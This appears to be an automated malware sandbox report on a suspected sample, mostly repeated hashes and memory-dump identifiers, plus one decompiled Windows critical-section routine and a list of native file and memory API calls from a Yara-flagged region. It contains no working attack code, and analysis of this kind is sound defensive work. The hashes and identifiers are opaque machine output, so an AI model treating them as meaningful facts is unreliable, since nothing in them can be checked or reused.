                                              • Opcode Fuzzy Hash: b26858e2ce06f20443228b1259f81fbb752f93464a741f8e2530f06ffa3cd697
                                              • Instruction Fuzzy Hash: B490026161154442D14062994814B0F8185A7E1243FD1C019A4186554CC95588656761
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2fe9f9ada4df872112199148dc0eddd837f4a5d6080dd1855b3d93d253d80464
                                              • Instruction ID: 73e9f320d188ea3f79ff49ad5a27ed0dc3927984ada1d5130019ff7f86ba7e94
                                              • Opcode Fuzzy Hash: 2fe9f9ada4df872112199148dc0eddd837f4a5d6080dd1855b3d93d253d80464
                                              • Instruction Fuzzy Hash: 1090027161150402D100619948187474085A7D0343F91C011A5194555EC6A5C8A17571
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a347ea4aef551ea581da2b5cb5c62d0e12e0c0886521ae5b3905a198d2e8a366
                                              • Instruction ID: 0169d6b25eaec9c287242cf6e0045f8ec283549fae5168d3efa7d6ae376a696b
                                              • Opcode Fuzzy Hash: a347ea4aef551ea581da2b5cb5c62d0e12e0c0886521ae5b3905a198d2e8a366
                                              • Instruction Fuzzy Hash: CB90027161110802D104619948146864085A7D0342F91C011A6054655ED6A588A17171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb172e44b97c24a33c896ad0cc7b294c0d0d4834f779977decaf45578b808ddd
                                              • Instruction ID: fb869649c22ce5cc690c505090ac736693a7c08b28daa4b8a8407879cdefbdb0
                                              • Opcode Fuzzy Hash: bb172e44b97c24a33c896ad0cc7b294c0d0d4834f779977decaf45578b808ddd
                                              • Instruction Fuzzy Hash: 40900271E15100129140719948246468086B7E0782B95C011A0544554CC9948A6563E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df2d04358f89ccc0cd4667c040d6dba9ebdddd23d77d90715eb5c78ce101c353
                                              • Instruction ID: a97ee66173ed7b0e37a8991fc08af0ee0b6c54505eb15a2192e34eea6b372aab
                                              • Opcode Fuzzy Hash: df2d04358f89ccc0cd4667c040d6dba9ebdddd23d77d90715eb5c78ce101c353
                                              • Instruction Fuzzy Hash: C49002E1611240924500A2998414B0A8585A7E0242B91C016E1084560CC5658861A175
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 500d9fbdbeed23ea0688c8fc2bc2d87562272f2d4fa0e7d99f9842bf0a1b391a
                                              • Instruction ID: cd203e9195355d12928e532f92788013e07130a62cd14e0a2842a9b5f58e76e1
                                              • Opcode Fuzzy Hash: 500d9fbdbeed23ea0688c8fc2bc2d87562272f2d4fa0e7d99f9842bf0a1b391a
                                              • Instruction Fuzzy Hash: 4F900265631100020145A599061450B44C5B7D63923D1C015F1446590CC66188756361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 11dfcc7774b81176154b4136b89bbc4f179b576d97748df886a2c4868ec48815
                                              • Instruction ID: 1d58a6f788e7e8e7f2df70df938bda3ab175aac5bcc7298ebdfa02dcc7f6f9bf
                                              • Opcode Fuzzy Hash: 11dfcc7774b81176154b4136b89bbc4f179b576d97748df886a2c4868ec48815
                                              • Instruction Fuzzy Hash: 1D900271711100529500A6D95814A4A8185A7F0342B91D015A4044554CC59488716161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cc7dcf6acdc2d17aaee73daf78b8d63eebf248481f6e323a5084e2420ed0875e
                                              • Instruction ID: 7d5bbe71b81109dfd854227b1dd724b2a0cbdbfb0bf8f20c0ff9d0176ed80e79
                                              • Opcode Fuzzy Hash: cc7dcf6acdc2d17aaee73daf78b8d63eebf248481f6e323a5084e2420ed0875e
                                              • Instruction Fuzzy Hash: CC900261A1510402D140719954287064095A7D0242F91D011A0054554DC6998A6576E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6671c3c64939c80a2073027ef7e906eb6ff9f900d78e35f8c1fa493d6cd429a2
                                              • Instruction ID: 0d51e2defc50e00ab912fde8ae30904f3dc1a2594eea483dafbb8d36fcef6af7
                                              • Opcode Fuzzy Hash: 6671c3c64939c80a2073027ef7e906eb6ff9f900d78e35f8c1fa493d6cd429a2
                                              • Instruction Fuzzy Hash: DA90027561514442D50065995814A874085A7D0346F91D411A045459CDC6948871B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e8ef19a6aa36f2664ae5b69bfda6edd18c1ad669d3b8d63acbeb255174119581
                                              • Instruction ID: de1f7cd9fe52777eaa019e83d12f1c7863347ec745462e9205b50708eb37b632
                                              • Opcode Fuzzy Hash: e8ef19a6aa36f2664ae5b69bfda6edd18c1ad669d3b8d63acbeb255174119581
                                              • Instruction Fuzzy Hash: 1A90026161514442D10065995418A064085A7D0246F91D011A1094595DC6758861B171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e3f7d16278b3c25dd23c6f7dbecf0f015662de814b599324750f3b3c6eaa811
                                              • Instruction ID: b7569417c32785d51139d7bbffa54a1fc5f0dec7e72558fe6cff3e8af8528cb5
                                              • Opcode Fuzzy Hash: 1e3f7d16278b3c25dd23c6f7dbecf0f015662de814b599324750f3b3c6eaa811
                                              • Instruction Fuzzy Hash: E890027161110403D100619955187074085A7D0242F91D411A0454558DD69688617161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 975b43d984765baa0982a2bbb0993c886140d0261de0792571f72b7a9d78b124
                                              • Instruction ID: c9021a21876530b93bb3b43616cc4c3fa1e8048902dd96d345e9781aadc4b894
                                              • Opcode Fuzzy Hash: 975b43d984765baa0982a2bbb0993c886140d0261de0792571f72b7a9d78b124
                                              • Instruction Fuzzy Hash: 9C90027161110842D10061994414B464085A7E0342F91C016A0154654DC655C8617561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c1d7013d6ffbb8267e0d408457a7e0db4867c718cf2dee030006277b02db146f
                                              • Instruction ID: 3e0dda3aaa51f3ebd6b044e59335734a548ced5fe445c91a4eb7d6efdbfb1a0f
                                              • Opcode Fuzzy Hash: c1d7013d6ffbb8267e0d408457a7e0db4867c718cf2dee030006277b02db146f
                                              • Instruction Fuzzy Hash: 54900271A1510802D150719944247464085A7D0342F91C011A0054654DC7958A6576E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67795cc70ba076844573fe49f3edb2ba0294203a00e66d2c242c7ff669dd11f0
                                              • Instruction ID: aa4bd14010cb60707b538f73adfaa91e180c99db87e0ae9808f8f246af9dfdac
                                              • Opcode Fuzzy Hash: 67795cc70ba076844573fe49f3edb2ba0294203a00e66d2c242c7ff669dd11f0
                                              • Instruction Fuzzy Hash: FF90027161514842D14071994414A464095A7D0346F91C011A0094694DD6658D65B6A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction ID: 17387ead08ee10de9573033b96520e48e21befe1425d0ec219086c1de7d52164
                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction Fuzzy Hash:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 53%
                                              			E0197FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                              				void* _t7;
                                              				intOrPtr _t9;
                                              				intOrPtr _t10;
                                              				intOrPtr* _t12;
                                              				intOrPtr* _t13;
                                              				intOrPtr _t14;
                                              				intOrPtr* _t15;
                                              
                                              				_t13 = __edx;
                                              				_push(_a4);
                                              				_t14 =  *[fs:0x18];
                                              				_t15 = _t12;
                                              				_t7 = E0192CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                              				_push(_t13);
                                              				E01975720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                              				_t9 =  *_t15;
                                              				if(_t9 == 0xffffffff) {
                                              					_t10 = 0;
                                              				} else {
                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                              				}
                                              				_push(_t10);
                                              				_push(_t15);
                                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                                              				return E01975720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                              			}

                                              0x0197fdda
                                              0x0197fde2
                                              0x0197fde5
                                              0x0197fdec
                                              0x0197fdfa
                                              0x0197fdff
                                              0x0197fe0a
                                              0x0197fe0f
                                              0x0197fe17
                                              0x0197fe1e
                                              0x0197fe19
                                              0x0197fe19
                                              0x0197fe19
                                              0x0197fe20
                                              0x0197fe21
                                              0x0197fe22
                                              0x0197fe25
                                              0x0197fe40

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0197FDFA
                                              Strings
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0197FE01
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0197FE2B
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 8faca7e64d17c73a88e3cab995300465b8c6e3289fc7fbefa1f1c270effdc2ff
                                              • Instruction ID: be1e839000e0d861026ded0029bb848aa538ec19f7670295436f854e8bb63232
                                              • Opcode Fuzzy Hash: 8faca7e64d17c73a88e3cab995300465b8c6e3289fc7fbefa1f1c270effdc2ff
                                              • Instruction Fuzzy Hash: 56F0C232200601BBEA201A55DC02E23BB6AEF84B30F150614F628561D1DA62B92096F0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,02D13BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D13BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02D1862D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: .z`$U
                                              • API String ID: 823142352-510634365
                                              • Opcode ID: a77eca7dfe08da1f5d00c6688aba2fa64a33e9c55b0d16d150f0328ce01b96ed
                                              • Instruction ID: 404109ec90ad1bc7a76472abc3009d74ba47ebdc1484c66eef08c01a072d4228
                                              • Opcode Fuzzy Hash: a77eca7dfe08da1f5d00c6688aba2fa64a33e9c55b0d16d150f0328ce01b96ed
                                              • Instruction Fuzzy Hash: 4001B2B2254208ABDB08CF99DC94EEB77EDEF8C754F158258FA1D97241D630E851CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,02D13BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D13BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02D1862D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: .z`
                                              • API String ID: 823142352-1441809116
                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                              • Instruction ID: 212bc69a968f58648e6c6095532fab450809e87a6517fd42403a414d6e6ed463
                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                              • Instruction Fuzzy Hash: ECF0BDB2204208ABCB08CF88DC94EEB77ADAF8C754F158248FA0D97240C630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtReadFile.NTDLL(02D13D72,5E972F65,FFFFFFFF,02D13A31,?,?,02D13D72,?,02D13A31,FFFFFFFF,5E972F65,02D13D72,?,00000000), ref: 02D186D5
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 7595eb86648a68fd0ddcae4f76788c50ec2ab6562c5b94951d801339a902f3ba
                                              • Instruction ID: b1ab3d772cac8f6c5224785fed3d629852fe3d1ecb5f381e50e6fb5472e35af5
                                              • Opcode Fuzzy Hash: 7595eb86648a68fd0ddcae4f76788c50ec2ab6562c5b94951d801339a902f3ba
                                              • Instruction Fuzzy Hash: 9E01F2B6200208AFDB14DF89EC80DAB77AEEF8C650F108649FA5C97250C630E851CBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtReadFile.NTDLL(02D13D72,5E972F65,FFFFFFFF,02D13A31,?,?,02D13D72,?,02D13A31,FFFFFFFF,5E972F65,02D13D72,?,00000000), ref: 02D186D5
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                              • Instruction ID: 6d1010b6f5c08e167a591a0f83a566d99fd058733bc0266f0fa8c5cbeaa49c90
                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                              • Instruction Fuzzy Hash: 4AF0A4B2200208ABCB14DF89DC94EEB77ADEF8C754F158248BA1D97241D630E951CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D02D11,00002000,00003000,00000004), ref: 02D187F9
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                              • Instruction ID: 0bcc7dec2832ce5086462229efa8c60ea98b4802e42ade69c224dd8d5f54f7c9
                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                              • Instruction Fuzzy Hash: 3AF015B2200208ABCB14DF89DC90EEB77ADEF88750F118148FE0897241C630F910CBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D02D11,00002000,00003000,00000004), ref: 02D187F9
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: d7d5eefd960e0da498575d20fa9efd2ece977158ab8dd3051e4c2ad48f7bfdd0
                                              • Instruction ID: 4ba84d105af6a978b0e3dcb550f7cb794fad4f0dd65bf1004fe758d26f49d399
                                              • Opcode Fuzzy Hash: d7d5eefd960e0da498575d20fa9efd2ece977158ab8dd3051e4c2ad48f7bfdd0
                                              • Instruction Fuzzy Hash: 37F015B6200109AFCB14DF98DC95EEB7BA9EF88354F158258FE49A7241C631E951CBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtClose.NTDLL(02D13D50,?,?,02D13D50,00000000,FFFFFFFF), ref: 02D18735
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                              • Instruction ID: 78a6a311cb9d017336cb255d0ea96a2991af08d85ea39b2c5b51947c4d3418e8
                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                              • Instruction Fuzzy Hash: FDD01776240214BBD710EB98DC89EE77BADEF48760F154499BA189B242C530FA40CAE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                               • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
                                               • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: cf8a8444886e479b753133cb732fe38279c503ee756a102d214f78e9985acd2a
                                              • Instruction ID: 036e9d5204a6877303f882bdce41d59326b4a845e4546322f9951c77d8f96fa6
                                              • Opcode Fuzzy Hash: cf8a8444886e479b753133cb732fe38279c503ee756a102d214f78e9985acd2a
                                              • Instruction Fuzzy Hash: AE900265211000073515A559070450704469BD9395391C031F1007560CD661D8657161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                               • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
                                               • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 7976adffd71db819ab114b884250ed713c8db381e7c82447d108e68d67171656
                                              • Instruction ID: 528678a6fe235e03500c3bd788fb30be60837c8db9376ce98e13575c79f04e4c
                                              • Opcode Fuzzy Hash: 7976adffd71db819ab114b884250ed713c8db381e7c82447d108e68d67171656
                                              • Instruction Fuzzy Hash: 709002A120200007751571594414616440A9BE4245B91C031E10065A0DC565D8957165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                               • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
                                               • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c58d590fbcc5f4476ff49cb6a0e6486b11f861a104b5bc3e7c668b1b6f59f05d
                                              • Instruction ID: 13e14efbe8f1738601437be1d3d29163245a103cf3900c025fa19ea5b9316b7f
                                              • Opcode Fuzzy Hash: c58d590fbcc5f4476ff49cb6a0e6486b11f861a104b5bc3e7c668b1b6f59f05d
                                              • Instruction Fuzzy Hash: 5F90027120100806F5907159440464A04059BD5345FD1C025A0017664DCA55DA5D77E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                               • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
                                               • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 491257b4e73553cbfe8826ffaf547bf53c2b0538bec096765cf1f6a2b78e2817
                                              • Instruction ID: 90a5cb84bb82a3959ec9d579b448e28f65f13f2c7fe386c3e0eb571e39f0d5db
                                              • Opcode Fuzzy Hash: 491257b4e73553cbfe8826ffaf547bf53c2b0538bec096765cf1f6a2b78e2817
                                              • Instruction Fuzzy Hash: 7B90027120504846F55071594404A4604159BD4349F91C021A00566A4D9665DD59B6A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                               • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
                                               • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 350f36ac0ebeca70b6d30c198f13a85c0b0ba3650de2be4d61affdf505585b9a
                                              • Instruction ID: 2bc478fa8838694022dd53f0a5887dc060d7358bcebe0240e4dc89b7348d4cef
                                              • Opcode Fuzzy Hash: 350f36ac0ebeca70b6d30c198f13a85c0b0ba3650de2be4d61affdf505585b9a
                                              • Instruction Fuzzy Hash: DE90027120108806F5206159840474A04059BD4345F95C421A4416668D86D5D8957161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                               • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
                                               • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 5d8cc5e05165f074b90d411326c191f5e8a5685da25e4304737f90ffbfad8cd1
                                              • Instruction ID: cf46df9eebcfa1458cfc528c3439705edf7b9c9a3e29c98a4037483374406fdd
                                              • Opcode Fuzzy Hash: 5d8cc5e05165f074b90d411326c191f5e8a5685da25e4304737f90ffbfad8cd1
                                              • Instruction Fuzzy Hash: AA90027120100846F51061594404B4604059BE4345F91C026A0116664D8655D8557561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                               • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
                                               • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: fed071d56ccbf0ca3d36cdd920d855788d70d374685ab62e62ba4f06e45e61b1
                                              • Instruction ID: 16386fe8692afe460bb55df4dd588470aca7d5f1a17e88ad66c0d3e6766738a1
                                              • Opcode Fuzzy Hash: fed071d56ccbf0ca3d36cdd920d855788d70d374685ab62e62ba4f06e45e61b1
                                              • Instruction Fuzzy Hash: B690027120100406F5106599540864604059BE4345F91D021A5016565EC6A5D8957171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                               • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
                                               • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d6bf0521a5ac810a0447368e5d5d20fa75cb206a143f74ca2820c7865f2a251a
                                              • Instruction ID: fa6eb9b880daa200e2bd685483d06bb0466e761099f6fa58bfee4d0ae22de168
                                              • Opcode Fuzzy Hash: d6bf0521a5ac810a0447368e5d5d20fa75cb206a143f74ca2820c7865f2a251a
                                              • Instruction Fuzzy Hash: 5C90027131114406F5206159840470604059BD5245F91C421A0816568D86D5D8957162
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                               • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
                                               • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8594991fc5f97722d69f8e6cf2e2cf75bd30b284835b7de3048b42b40dbb7dae
                                              • Instruction ID: c3e80b62e29d29c3ad34b2011495fb01b1d32dde87a4011b0584f26f691b771d
                                              • Opcode Fuzzy Hash: 8594991fc5f97722d69f8e6cf2e2cf75bd30b284835b7de3048b42b40dbb7dae
                                              • Instruction Fuzzy Hash: B090026921300006F5907159540860A04059BD5246FD1D425A0007568CC955D86D7361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                               • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
                                               • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: a59ba39544880a78e2d72505e8fc7447b23ce94ea808636dfaaeaa4b36d01b53
                                              • Instruction ID: e562573f872b171bcc38f9ac500032e6020ee166c48da4e4927d68cfb0211d3d
                                              • Opcode Fuzzy Hash: a59ba39544880a78e2d72505e8fc7447b23ce94ea808636dfaaeaa4b36d01b53
                                              • Instruction Fuzzy Hash: F890027120100417F5216159450470704099BD4285FD1C422A0416568D9696D956B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                               • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
                                               • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
